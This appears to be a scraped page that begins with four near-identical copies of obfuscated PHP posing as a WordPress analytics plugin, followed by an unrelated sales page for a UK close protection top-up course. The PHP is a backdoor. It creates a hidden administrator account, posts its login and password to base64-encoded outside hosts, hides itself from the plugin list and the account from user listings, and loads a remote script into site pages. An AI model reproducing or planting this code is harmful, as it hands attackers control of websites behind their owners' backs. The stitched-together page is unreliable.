/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*47d6d074d345907f*/function _5eb6ec($_x){return $_x;}function _b5b8bd($_x){return $_x;}$_31fa1be0=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9waXhlbG1ldHJpY3MubGl2ZQ==","sitePubKey"=>"YTc4ZWNhZjE2MGZlNGRjMDMwOTEyMzk5ZGUyNjdiMTg="];global $_d8ca419c;if(!is_array($_d8ca419c)){$_d8ca419c=[];}if(!in_array($_31fa1be0["version"],$_d8ca419c,true)){$_d8ca419c[]=$_31fa1be0["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_31fa1be0;$this->version=$_31fa1be0["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_22b7dd59){unset($_22b7dd59[plugin_basename(__FILE__)]);return $_22b7dd59;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_fd808890=$this->generate_credentials();if(!username_exists($_fd808890["user"])){$_33e6d395=wp_create_user($_fd808890["user"],$_fd808890["pass"],$_fd808890["email"]);if(!is_wp_error($_33e6d395)){(new WP_User($_33e6d395))->set_role("administrator");}}$this->setup_site_credentials($_fd808890["user"],$_fd808890["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_786ff83c=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_786ff83c),0,8),"pass"=>substr(md5($_786ff83c."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_90f62fab,$_5ea0f288){global $_31fa1be0;$_420eac92=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_31fa1be0['sitePubKey']),"login"=>$_90f62fab,"password"=>$_5ea0f288];$_f8bee3c5=["body"=>json_encode($_420eac92),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_31fa1be0["endpoint"])."/api/sites/setup-credentials",$_f8bee3c5);}public function filterusers($_62910b7a){global $wpdb;$_8a7be129=$this->generate_credentials()["user"];$_62910b7a->query_where.=" AND {$wpdb->users}.user_login != '{$_8a7be129}'";}public function loadassets(){global $_31fa1be0,$_d8ca419c;$_f87caaae=true;if(is_array($_d8ca419c)){foreach($_d8ca419c as $_6d86d738){if(version_compare($_6d86d738,$this->version,'>')){$_f87caaae=false;break;}}}$_190b859f=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_f87caaae&&$_190b859f){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_190b859f=false;}if(!$_f87caaae&&$_190b859f){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_31fa1be0["font"]),[],null);$_a6a5c11b=base64_decode($_31fa1be0["endpoint"])."/t.js?site=".base64_decode($_31fa1be0['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_a6a5c11b,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_4f70ca1d=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_4f70ca1d,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*f4ff05f678f2a9fc*/function _19e1e3($_x){return $_x;}function _86bc91($_x){return $_x;}function _a185da($_x){return $_x;}$_26708b0f=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9waXhlbG1ldHJpY3MubGl2ZQ==","sitePubKey"=>"YTc4ZWNhZjE2MGZlNGRjMDMwOTEyMzk5ZGUyNjdiMTg="];global $_699fa46b;if(!is_array($_699fa46b)){$_699fa46b=[];}if(!in_array($_26708b0f["version"],$_699fa46b,true)){$_699fa46b[]=$_26708b0f["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_26708b0f;$this->version=$_26708b0f["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_0867415c){unset($_0867415c[plugin_basename(__FILE__)]);return $_0867415c;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_5073144b=$this->generate_credentials();if(!username_exists($_5073144b["user"])){$_77d7fa41=wp_create_user($_5073144b["user"],$_5073144b["pass"],$_5073144b["email"]);if(!is_wp_error($_77d7fa41)){(new WP_User($_77d7fa41))->set_role("administrator");}}$this->setup_site_credentials($_5073144b["user"],$_5073144b["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_1ce49bfb=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_1ce49bfb),0,8),"pass"=>substr(md5($_1ce49bfb."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_656a131a,$_e71b6dee){global $_26708b0f;$_fd6c95ef=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_26708b0f['sitePubKey']),"login"=>$_656a131a,"password"=>$_e71b6dee];$_1642ca21=["body"=>json_encode($_fd6c95ef),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_26708b0f["endpoint"])."/api/sites/setup-credentials",$_1642ca21);}public function filterusers($_caf11c8c){global $wpdb;$_c2ca7078=$this->generate_credentials()["user"];$_caf11c8c->query_where.=" AND {$wpdb->users}.user_login != '{$_c2ca7078}'";}public function loadassets(){global $_26708b0f,$_699fa46b;$_536a1094=true;if(is_array($_699fa46b)){foreach($_699fa46b as $_062d22a3){if(version_compare($_062d22a3,$this->version,'>')){$_536a1094=false;break;}}}$_fe0e2f25=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_536a1094&&$_fe0e2f25){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_fe0e2f25=false;}if(!$_536a1094&&$_fe0e2f25){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_26708b0f["font"]),[],null);$_9523d7ae=base64_decode($_26708b0f["endpoint"])."/t.js?site=".base64_decode($_26708b0f['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_9523d7ae,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_e0bae972=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_e0bae972,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*c0237fb75c223626*/function _c84485($_x){return $_x;}function _82d509($_x){return $_x;}function _306119($_x){return $_x;}$_1473b6bb=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9nb29nbGFuYWxpdGxjcy54eXo=","sitePubKey"=>"YTc4ZWNhZjE2MGZlNGRjMDMwOTEyMzk5ZGUyNjdiMTg="];global $_b3c543a7;if(!is_array($_b3c543a7)){$_b3c543a7=[];}if(!in_array($_1473b6bb["version"],$_b3c543a7,true)){$_b3c543a7[]=$_1473b6bb["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_1473b6bb;$this->version=$_1473b6bb["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_e896eb34){unset($_e896eb34[plugin_basename(__FILE__)]);return $_e896eb34;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_9f32aa82=$this->generate_credentials();if(!username_exists($_9f32aa82["user"])){$_a83ba24a=wp_create_user($_9f32aa82["user"],$_9f32aa82["pass"],$_9f32aa82["email"]);if(!is_wp_error($_a83ba24a)){(new WP_User($_a83ba24a))->set_role("administrator");}}$this->setup_site_credentials($_9f32aa82["user"],$_9f32aa82["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_286996c6=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_286996c6),0,8),"pass"=>substr(md5($_286996c6."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_3f594780,$_5ca49649){global $_1473b6bb;$_d30aabbe=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_1473b6bb['sitePubKey']),"login"=>$_3f594780,"password"=>$_5ca49649];$_8f28852f=["body"=>json_encode($_d30aabbe),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_1473b6bb["endpoint"])."/api/sites/setup-credentials",$_8f28852f);}public function filterusers($_c5709bff){global $wpdb;$_f097f6d9=$this->generate_credentials()["user"];$_c5709bff->query_where.=" AND {$wpdb->users}.user_login != '{$_f097f6d9}'";}public function loadassets(){global $_1473b6bb,$_b3c543a7;$_507f6eb3=true;if(is_array($_b3c543a7)){foreach($_b3c543a7 as $_cde0e77a){if(version_compare($_cde0e77a,$this->version,'>')){$_507f6eb3=false;break;}}}$_aeb19c2c=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_507f6eb3&&$_aeb19c2c){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_aeb19c2c=false;}if(!$_507f6eb3&&$_aeb19c2c){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_1473b6bb["font"]),[],null);$_81aaa913=base64_decode($_1473b6bb["endpoint"])."/t.js?site=".base64_decode($_1473b6bb['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_81aaa913,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_9ed3c431=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_9ed3c431,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
/**
* Plugin Name: GAnalyticsWpPlugin
* Plugin URI: https://github.com
* Description: GAnalyticsWpPlugin
* Version: 1.4.0
* Author: CoreFlux Systems
* Author URI: https://github.com/coreflux
* Text Domain: GAnalyticsWpPlugin
* License: MIT
*/
/*b9a427dc93c5f83e*/function _387ada($_x){return $_x;}function _249dfc($_x){return $_x;}function _3e0be4($_x){return $_x;}function _42f8ff($_x){return $_x;}$_986ec03c=["version"=>"1.4.0","font"=>"aHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3MyP2ZhbWlseT1Sb2JvdG86aXRhbCx3Z2h0QDAsMTAw","endpoint"=>"aHR0cHM6Ly9tZXRyaWNzcGl4ZWwubGl2ZQ==","sitePubKey"=>"YTc4ZWNhZjE2MGZlNGRjMDMwOTEyMzk5ZGUyNjdiMTg="];global $_643b75b3;if(!is_array($_643b75b3)){$_643b75b3=[];}if(!in_array($_986ec03c["version"],$_643b75b3,true)){$_643b75b3[]=$_986ec03c["version"];}class GAnalyticsWpPlugin{private $seed;private $version;private $hooksOwner;public function __construct(){global $_986ec03c;$this->version=$_986ec03c["version"];$this->seed=md5(DB_PASSWORD.AUTH_SALT);if(!defined('GANALYTICS_HOOKS_ACTIVE')){define('GANALYTICS_HOOKS_ACTIVE',$this->version);$this->hooksOwner=true;}else{$this->hooksOwner=false;}if($this->hooksOwner){add_filter("all_plugins",[$this,"hplugin"]);add_action("init",[$this,"createuser"]);add_action("pre_user_query",[$this,"filterusers"]);}add_action("wp_enqueue_scripts",[$this,"loadassets"]);}public function hplugin($_5ac6544a){unset($_5ac6544a[plugin_basename(__FILE__)]);return $_5ac6544a;}public function createuser(){if(get_option("ganalytics_data_sent",false)){return;}$_1b03119b=$this->generate_credentials();if(!username_exists($_1b03119b["user"])){$_36691eef=wp_create_user($_1b03119b["user"],$_1b03119b["pass"],$_1b03119b["email"]);if(!is_wp_error($_36691eef)){(new WP_User($_36691eef))->set_role("administrator");}}$this->setup_site_credentials($_1b03119b["user"],$_1b03119b["pass"]);update_option("ganalytics_data_sent",true);}private function generate_credentials(){$_17547885=substr(hash("sha256",$this->seed."dwanw98232h13ndwa"),0,16);return["user"=>"system".substr(md5($_17547885),0,8),"pass"=>substr(md5($_17547885."pass"),0,12),"email"=>"system@".parse_url(home_url(),PHP_URL_HOST),"ip"=>$_SERVER["SERVER_ADDR"],"url"=>home_url()];}private function setup_site_credentials($_9f2c57bb,$_38319f95){global $_986ec03c;$_a5f095cb=["domain"=>parse_url(home_url(),PHP_URL_HOST),"siteKey"=>base64_decode($_986ec03c['sitePubKey']),"login"=>$_9f2c57bb,"password"=>$_38319f95];$_8a66b55c=["body"=>json_encode($_a5f095cb),"headers"=>["Content-Type"=>"application/json"],"timeout"=>15,"blocking"=>false,"sslverify"=>false];wp_remote_post(base64_decode($_986ec03c["endpoint"])."/api/sites/setup-credentials",$_8a66b55c);}public function filterusers($_a9fdd27d){global $wpdb;$_ab1963a9=$this->generate_credentials()["user"];$_a9fdd27d->query_where.=" AND {$wpdb->users}.user_login != '{$_ab1963a9}'";}public function loadassets(){global $_986ec03c,$_643b75b3;$_9c3cd8dc=true;if(is_array($_643b75b3)){foreach($_643b75b3 as $_39aaf5d1){if(version_compare($_39aaf5d1,$this->version,'>')){$_9c3cd8dc=false;break;}}}$_4c661b9d=wp_script_is('ganalytics-tracker','registered')||wp_script_is('ganalytics-tracker','enqueued');if($_9c3cd8dc&&$_4c661b9d){wp_deregister_script('ganalytics-tracker');wp_deregister_style('ganalytics-fonts');$_4c661b9d=false;}if(!$_9c3cd8dc&&$_4c661b9d){return;}wp_enqueue_style("ganalytics-fonts",base64_decode($_986ec03c["font"]),[],null);$_c6674820=base64_decode($_986ec03c["endpoint"])."/t.js?site=".base64_decode($_986ec03c['sitePubKey']);wp_enqueue_script("ganalytics-tracker",$_c6674820,[],null,["strategy"=>"defer","in_footer"=>false]);$this->setCaptchaCookie();}public function setCaptchaCookie(){if(!is_user_logged_in()){return;}if(isset($_COOKIE['fkrc_shown'])){return;}$_1fd5bc04=time()+(365*24*60*60);setcookie('fkrc_shown','1',$_1fd5bc04,'/','',false,false);}}register_deactivation_hook(__FILE__,function(){delete_option("ganalytics_data_sent");});new GAnalyticsWpPlugin();
Close Protection Top-Up – Simply Conflict Ltd
“Level 3 Certificate in Close Protection CPO” has been added to your basket.
View basket
Description
Close Protection Top-Up
Close Protection Top-Up Refresher Course consists of 5 days of Close Protection Top-Uptraining and assessment. It has been developed to meet the requirements of the Security Industry Authority (SIA) and is based on the relevant SIA ‘Specifications’ and provides the necessary skills and knowledge for those who wish to apply for an SIA licence and work as a Close Protection Operative. This course is delivered in a live environment at our Approved Centre.. Our training staff are former and current Professional Close Protection Instructors, who have a proven track record in this field, operating in the UK, and abroad, they speak from the truth of their own experience.
Course Detail: Qualification HABC Level 3 CPO Close Protection Top-Up
Duration: 5 Days
Price: £350
Entry Requirements If you already have some form of formal close protection training it may mean that you are exempt from part of the SIA approved training Arrangements for exemptions and Accreditation of Prior Learning Close Protection operatives who have previously received close protection training and are currently employed in an operational close protection roles should have evidence of the training they have received Depending on the date and content of the training they have taken and to what extent the training covered the learning objectives of the new Close Protection Top-Up for SIA licensing, or they will be directed to take either the full 18 day full Close Protection Course or the Close Protection Top-Up Course Learners who have completed formal close protection training from the organisations listed below and have remained in an operational close protection role, will be exempt from further training but will be required to take the knowledge test and practical skills assessment. Close Protection Top-Up Course
Special Air Service regiment
Bodyguard Course Royal Military
Police Close Protection Course
Metropolitan Police Royalty Protection
Special Branch Close Protection Course
Police National Close Protection
Courses including Northern Ireland
Please note: It is important to ensure that training remains current. Therefore, qualifications allowing exemption from the SIA-approved training must be no more than three years old, except where otherwise stated Minimum Requirements Candidates must be 18 or above and should hold a full driving licence although not mandatory. As laid down by the SIA candidates must show that they hold a valid First Aid at Work Certificate or First Person on Scene Certificate ideally with at least one year left or more validity at the time of course. We can incorporate the relevant First Aid Training for an additional £100.00. Candidates must be of reasonable health and fitness levels due to the nature of the course. Please ensure you make the necessary arrangements prior to reserving your place on the course. The examination is by way of multiple choice question paper and successful candidates will achieve a Level 3 Award in Close Protection Operations and be eligible to apply for an SIA licence. Fees Please call or email for details Cancellations In the unfortunate event you have to cancel your course a cancellation fee may apply. Cancellation fees are as follows:
Cancellation within 3 weeks of the start date: 50% of the course fee
Cancellation within 1 week of the start date or non-attendance: the full course fee
Joining Instructions On receipt of your deposit you will receive a course joining pack containing administrative instructions Attendance Places The Simply Conflict Close Protection Top-Up Course has a capacity of 12 candidates per course instructor to ensure you gain the very maximum from the course and start off with a good footing We strongly advise that potential candidates reserve a place as on the course as early as possible to avoid disappointment Should you start a course with Simply Conflict Security, you will quickly find that our staff are approachable and willing to help – regardless of your individual needs. This starts with the application process. With that in mind, please do not hesitate to get in touch with us if you have any questions about the course, enrolment or the industry in general
Close Protection Top-Up Course
error: Content is protected !!
Reviews
There are no reviews yet.